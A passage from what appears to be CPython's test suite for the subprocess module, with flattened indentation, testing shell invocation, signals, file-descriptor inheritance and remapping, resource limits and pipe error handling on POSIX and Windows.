from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if there arises a situation where one of the fds is
# either 0, 1 or 2, it is possible that it is overwritten (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def _check_swap_std_fds_with_one_closed(self, from_fds, to_fds):
saved_fds = self._save_fds(range(3))
try:
for from_fd in from_fds:
with tempfile.TemporaryFile() as f:
os.dup2(f.fileno(), from_fd)
fd_to_close = (set(range(3)) - set(from_fds)).pop()
os.close(fd_to_close)
arg_names = ['stdin', 'stdout', 'stderr']
kwargs = {}
for from_fd, to_fd in zip(from_fds, to_fds):
kwargs[arg_names[to_fd]] = from_fd
code = textwrap.dedent(r'''
import os, sys
skipped_fd = int(sys.argv[1])
for fd in range(3):
if fd != skipped_fd:
os.write(fd, str(fd).encode('ascii'))
''')
skipped_fd = (set(range(3)) - set(to_fds)).pop()
rc = subprocess.call([sys.executable, '-c', code, str(skipped_fd)],
**kwargs)
self.assertEqual(rc, 0)
for from_fd, to_fd in zip(from_fds, to_fds):
os.lseek(from_fd, 0, os.SEEK_SET)
read_bytes = os.read(from_fd, 1024)
read_fds = list(map(int, read_bytes.decode('ascii')))
msg = textwrap.dedent(f"""
When testing {from_fds} to {to_fds} redirection,
parent descriptor {from_fd} got redirected
to descriptor(s) {read_fds} instead of descriptor {to_fd}.
""")
self.assertEqual([to_fd], read_fds, msg)
finally:
self._restore_fds(saved_fds)
# Check that subprocess can remap std fds correctly even
# if one of them is closed (#32844).
def test_swap_std_fds_with_one_closed(self):
for from_fds in itertools.combinations(range(3), 2):
for to_fds in itertools.permutations(range(3), 2):
self._check_swap_std_fds_with_one_closed(from_fds, to_fds)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# Pure Python implementations keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
except ProcessLookupError:
pass
self.addCleanup(kill_p1)
self.addCleanup(kill_p2)
p1.stdin.write(data)
p1.stdin.close()
readfiles, ignored1, ignored2 = select.select([p2.stdout], [], [], 10)
self.assertTrue(readfiles, "The child hung")
self.assertEqual(p2.stdout.read(), data)
p1.stdout.close()
p2.stdout.close()
def test_close_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
open_fds = set(fds)
# add a bunch more fds
for _ in range(9):
fd = os.open(os.devnull, os.O_RDONLY)
self.addCleanup(os.close, fd)
open_fds.add(fd)
for fd in open_fds:
os.set_inheritable(fd, True)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertEqual(remaining_fds & open_fds, open_fds,
"Some fds were closed")
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse(remaining_fds & open_fds,
"Some fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
# Keep some of the fd's we opened open in the subprocess.
# This tests _posixsubprocess.c's proper handling of fds_to_keep.
fds_to_keep = set(open_fds.pop() for _ in range(8))
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=fds_to_keep)
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
"Some fds not in pass_fds were left open")
self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
"Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
"""Confirm that issue21618 is fixed (may fail under valgrind)."""
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# This launches the meat of the test in a child process to
# avoid messing with the larger unittest processes maximum
# number of file descriptors.
# This process launches:
# +--> Process that lowers its RLIMIT_NOFILE aftr setting up
# a bunch of high open fds above the new lower rlimit.
# Those are reported via stdout before launching a new
# process with close_fds=False to run the actual test:
# +--> The TEST: This one launches a fd_status.py
# subprocess with close_fds=True so we can find out if
# any of the fds above the lowered rlimit are still open.
p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
'''
import os, resource, subprocess, sys, textwrap
open_fds = set()
# Add a bunch more fds to pass down.
for _ in range(40):
fd = os.open(os.devnull, os.O_RDONLY)
open_fds.add(fd)
# Leave a two pairs of low ones available for use by the
# internal child error pipe and the stdout pipe.
# We also leave 10 more open as some Python buildbots run into
# "too many open files" errors during the test if we do not.
for fd in sorted(open_fds)[:14]:
os.close(fd)
open_fds.remove(fd)
for fd in open_fds:
#self.addCleanup(os.close, fd)
os.set_inheritable(fd, True)
max_fd_open = max(open_fds)
# Communicate the open_fds to the parent unittest.TestCase process.
print(','.join(map(str, sorted(open_fds))))
sys.stdout.flush()
rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
try:
# 29 is lower than the highest fds we are leaving open.
resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
# Launch a new Python interpreter with our low fd rlim_cur that
# inherits open fds above that limit. It then uses subprocess
# with close_fds=True to get a report of open fds in the child.
# An explicit list of fds to check is passed to fd_status.py as
# letting fd_status rely on its default logic would miss the
# fds above rlim_cur as it normally only checks up to that limit.
subprocess.Popen(
[sys.executable, '-c',
textwrap.dedent("""
import subprocess, sys
subprocess.Popen([sys.executable, %r] +
[str(x) for x in range({max_fd})],
close_fds=True).wait()
""".format(max_fd=max_fd_open+1))],
close_fds=False).wait()
finally:
resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
''' % fd_status)], stdout=subprocess.PIPE)
output, unused_stderr = p.communicate()
output_lines = output.splitlines()
self.assertEqual(len(output_lines), 2,
msg="expected exactly two lines of output:\n%r" % output)
opened_fds = set(map(int, output_lines[0].strip().split(b',')))
remaining_fds = set(map(int, output_lines[1].strip().split(b',')))
self.assertFalse(remaining_fds & opened_fds,
msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
open_fds = set()
for x in range(5):
fds = os.pipe()
self.addCleanup(os.close, fds[0])
self.addCleanup(os.close, fds[1])
os.set_inheritable(fds[0], True)
os.set_inheritable(fds[1], True)
open_fds.update(fds)
for fd in open_fds:
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
pass_fds=(fd, ))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
to_be_closed = open_fds - {fd}
self.assertIn(fd, remaining_fds, "fd to be passed not passed")
self.assertFalse(remaining_fds & to_be_closed,
"fd to be closed passed")
# pass_fds overrides close_fds with a warning.
with self.assertWarns(RuntimeWarning) as context:
self.assertFalse(subprocess.call(
[sys.executable, "-c", "import sys; sys.exit(0)"],
close_fds=False, pass_fds=(fd, )))
self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
script = support.findfile("fd_status.py", subdir="subprocessdata")
inheritable, non_inheritable = os.pipe()
self.addCleanup(os.close, inheritable)
self.addCleanup(os.close, non_inheritable)
os.set_inheritable(inheritable, True)
os.set_inheritable(non_inheritable, False)
pass_fds = (inheritable, non_inheritable)
args = [sys.executable, script]
args += list(map(str, pass_fds))
p = subprocess.Popen(args,
stdout=subprocess.PIPE, close_fds=True,
pass_fds=pass_fds)
output, ignored = p.communicate()
fds = set(map(int, output.split(b',')))
# the inheritable file descriptor must be inherited, so its inheritable
# flag must be set in the child process after fork() and before exec()
self.assertEqual(fds, set(pass_fds), "output=%a" % output)
# inheritable flag must not be changed in the parent process
self.assertEqual(os.get_inheritable(inheritable), True)
self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
# NOTE: sigchild_ignore.py may not be an effective test on all OSes.
sigchild_ignore = support.findfile("sigchild_ignore.py",
subdir="subprocessdata")
p = subprocess.Popen([sys.executable, sigchild_ignore],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
" non-zero with this error:\n%s" %
stderr.decode('utf-8'))
def test_select_unbuffered(self):
# Issue #11459: bufsize=0 should really set the pipes as
# unbuffered (and therefore let select() work properly).
select = support.import_module("select")
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple")'],
stdout=subprocess.PIPE,
bufsize=0)
f = p.stdout
self.addCleanup(f.close)
try:
self.assertEqual(f.read(4), b"appl")
self.assertIn(f, select.select([f], [], [], 0.0)[0])
finally:
p.wait()
def test_zombie_fast_process_del(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, it wouldn't be added to subprocess._active, and would
# remain a zombie.
# spawn a Popen, and delete its reference before it exits
p = subprocess.Popen([sys.executable, "-c",
'import sys, time;'
'time.sleep(0.2)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
# Issue #12650: on Unix, if Popen.__del__() was called before the
# process exited, and the process got killed by a signal, it would never
# be removed from subprocess._active, which triggered a FD and memory
# leak.
# spawn a Popen, delete its reference and kill it
p = subprocess.Popen([sys.executable, "-c",
'import time;'
'time.sleep(3)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
ident = id(p)
pid = p.pid
with support.check_warnings(('', ResourceWarning)):
p = None
os.kill(pid, signal.SIGKILL)
# check that p is in the active processes list
self.assertIn(ident, [id(o) for o in subprocess._active])
# let some time for the process to exit, and create a new Popen: this
# should trigger the wait() of p
time.sleep(0.2)
with self.assertRaises(OSError):
with subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE) as proc:
pass
# p should have been wait()ed on, and removed from the _active list
self.assertRaises(OSError, os.waitpid, pid, 0)
self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
# this FD is used as dup2() target by preexec_fn, and should be closed
# in the child process
fd = os.dup(1)
self.addCleanup(os.close, fd)
p = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=True,
preexec_fn=lambda: os.dup2(1, fd))
output, ignored = p.communicate()
remaining_fds = set(map(int, output.split(b',')))
self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
# Issue #22290: fork_exec() must not crash on memory allocation failure
# or other errors
import _posixsubprocess
gc_enabled = gc.isenabled()
try:
# Use a preexec function and enable the garbage collector
# to force fork_exec() to re-enable the garbage collector
# on error.
func = lambda: None
gc.enable()
for args, exe_list, cwd, env_list in (
(123, [b"exe"], None, [b"env"]),
([b"arg"], 123, None, [b"env"]),
([b"arg"], [b"exe"], 123, [b"env"]),
([b"arg"], [b"exe"], None, 123),
):
with self.assertRaises(TypeError):
_posixsubprocess.fork_exec(
args, exe_list,
True, (), cwd, env_list,
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, func)
finally:
if not gc_enabled:
gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
# Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
import _posixsubprocess
class BadInt:
first = True
def __init__(self, value):
self.value = value
def __int__(self):
if self.first:
self.first = False
return self.value
raise ValueError
gc_enabled = gc.isenabled()
try:
gc.enable()
for fds_to_keep in (
(-1, 2, 3, 4, 5), # Negative number.
('str', 4), # Not an int.
(18, 23, 42, 2**63), # Out of range.
(5, 4), # Not sorted.
(6, 7, 7, 8), # Duplicate.
(BadInt(1), BadInt(2)),
):
with self.assertRaises(
ValueError,
msg='fds_to_keep={}'.format(fds_to_keep)) as c:
_posixsubprocess.fork_exec(
[b"false"], [b"false"],
True, fds_to_keep, None, [b"env"],
-1, -1, -1, -1,
1, 2, 3, 4,
True, True, None)
self.assertIn('fds_to_keep', str(c.exception))
finally:
if not gc_enabled:
gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
open(os.devnull, 'wb') as dev_null:
mock_proc_stdin.flush.side_effect = BrokenPipeError
# because _communicate registers a selector using proc.stdin...
mock_proc_stdin.fileno.return_value = dev_null.fileno()
# _communicate() should swallow BrokenPipeError from flush.
proc.communicate(b'stuff')
mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
and hasattr(_testcapi, 'W_STOPCODE'),
'need _testcapi.W_STOPCODE')
def test_stopped(self):
"""Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
args = [sys.executable, '-c', 'pass']
proc = subprocess.Popen(args)
# Wait until the real process completes to avoid zombie process
pid = proc.pid
pid, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
status = _testcapi.W_STOPCODE(3)
with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
returncode = proc.wait()
self.assertEqual(returncode, -3)
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
def test_startupinfo(self):
# startupinfo argument
# We uses hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USESHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO()
startupinfo.dwFlags = STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_MAXIMIZE
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_startupinfo_keywords(self):
# startupinfo argument
# We use hardcoded constants, because we do not want to
# depend on win32all.
STARTF_USERSHOWWINDOW = 1
SW_MAXIMIZE = 3
startupinfo = subprocess.STARTUPINFO(
dwFlags=STARTF_USERSHOWWINDOW,
wShowWindow=SW_MAXIMIZE
)
# Since Python is a console process, it won't be affected
# by wShowWindow, but the argument should be silently
# ignored
subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
startupinfo=startupinfo)
def test_creationflags(self):
# creationflags argument
CREATE_NEW_CONSOLE = 16
sys.stderr.write(" a DOS box should flash briefly ...\n")
subprocess.call(sys.executable +
' -c "import time; time.sleep(0.25)"',
creationflags=CREATE_NEW_CONSOLE)
def test_invalid_args(self):
# invalid arguments should raise ValueError
